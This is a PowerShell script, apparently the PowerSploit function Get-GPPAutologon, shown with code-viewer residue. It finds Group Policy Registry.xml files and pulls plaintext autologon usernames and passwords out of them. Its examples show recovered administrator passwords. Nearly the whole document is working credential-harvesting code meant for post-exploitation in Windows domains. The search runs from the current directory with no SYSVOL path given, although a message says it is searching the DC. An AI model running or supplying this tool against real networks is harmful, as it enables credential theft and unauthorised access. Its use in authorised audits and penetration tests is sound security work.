140 lines
4.6 KiB
PowerShell
140 lines
4.6 KiB
PowerShell
|
function Get-GPPAutologon
|
||
|
{
|
||
|
<#
|
||
|
.SYNOPSIS
|
||
|
|
||
|
Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
|
||
|
|
||
|
PowerSploit Function: Get-GPPAutologon
|
||
|
Author: Oddvar Moe (@oddvarmoe)
|
||
|
Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
|
||
|
License: BSD 3-Clause
|
||
|
Required Dependencies: None
|
||
|
Optional Dependencies: None
|
||
|
|
||
|
.DESCRIPTION
|
||
|
|
||
|
Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
|
||
|
|
||
|
.EXAMPLE
|
||
|
|
||
|
PS C:\> Get-GPPAutolgon
|
||
|
|
||
|
UserNames File Passwords
|
||
|
--------- ---- ---------
|
||
|
{administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
|
||
|
{NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
|
||
|
|
||
|
|
||
|
.EXAMPLE
|
||
|
|
||
|
PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
|
||
|
|
||
|
password
|
||
|
password12
|
||
|
password123
|
||
|
password1234
|
||
|
password1234$
|
||
|
read123
|
||
|
Recycling*3ftw!
|
||
|
|
||
|
.LINK
|
||
|
|
||
|
https://support.microsoft.com/nb-no/kb/324737
|
||
|
#>
|
||
|
|
||
|
[CmdletBinding()]
|
||
|
Param ()
|
||
|
|
||
|
#Some XML issues between versions
|
||
|
Set-StrictMode -Version 2
|
||
|
[System.Reflection.Assembly]::LoadWithPartialName("System.Core") |Out-Null
|
||
|
|
||
|
#define helper function to parse fields from xml files
|
||
|
function Get-GPPInnerFields
|
||
|
{
|
||
|
[CmdletBinding()]
|
||
|
Param (
|
||
|
$File
|
||
|
)
|
||
|
|
||
|
try
|
||
|
{
|
||
|
$Filename = Split-Path $File -Leaf
|
||
|
[xml] $Xml = Get-Content ($File)
|
||
|
|
||
|
#declare empty arrays
|
||
|
$Password = @()
|
||
|
$UserName = @()
|
||
|
|
||
|
#check for password and username field
|
||
|
if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
|
||
|
{
|
||
|
$props = $xml.GetElementsByTagName("Properties")
|
||
|
foreach($prop in $props)
|
||
|
{
|
||
|
switch ($prop.name)
|
||
|
{
|
||
|
'DefaultPassword'
|
||
|
{
|
||
|
$Password += , $prop | Select-Object -ExpandProperty Value
|
||
|
}
|
||
|
|
||
|
'DefaultUsername'
|
||
|
{
|
||
|
$Username += , $prop | Select-Object -ExpandProperty Value
|
||
|
}
|
||
|
}
|
||
|
|
||
|
Write-Verbose "Potential password in $File"
|
||
|
}
|
||
|
|
||
|
#put [BLANK] in variables
|
||
|
if (!($Password))
|
||
|
{
|
||
|
$Password = '[BLANK]'
|
||
|
}
|
||
|
|
||
|
if (!($UserName))
|
||
|
{
|
||
|
$UserName = '[BLANK]'
|
||
|
}
|
||
|
|
||
|
#Create custom object to output results
|
||
|
$ObjectProperties = @{'Passwords' = $Password;
|
||
|
'UserNames' = $UserName;
|
||
|
'File' = $File}
|
||
|
|
||
|
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
|
||
|
Write-Verbose "The password is between {} and may be more than one value."
|
||
|
if ($ResultsObject)
|
||
|
{
|
||
|
Return $ResultsObject
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
catch {Write-Error $Error[0]}
|
||
|
}
|
||
|
|
||
|
try {
|
||
|
#ensure that machine is domain joined and script is running as a domain account
|
||
|
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
|
||
|
throw 'Machine is not a domain member or User is not a member of the domain.'
|
||
|
}
|
||
|
|
||
|
#discover potential registry.xml containing autologon passwords
|
||
|
Write-Verbose 'Searching the DC. This could take a while.'
|
||
|
$XMlFiles = Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
|
||
|
|
||
|
if ( -not $XMlFiles ) {throw 'No preference files found.'}
|
||
|
|
||
|
Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
|
||
|
|
||
|
foreach ($File in $XMLFiles) {
|
||
|
$Result = (Get-GppInnerFields $File.Fullname)
|
||
|
Write-Output $Result
|
||
|
}
|
||
|
}
|
||
|
|
||
|
catch {Write-Error $Error[0]}
|
||
|
}
|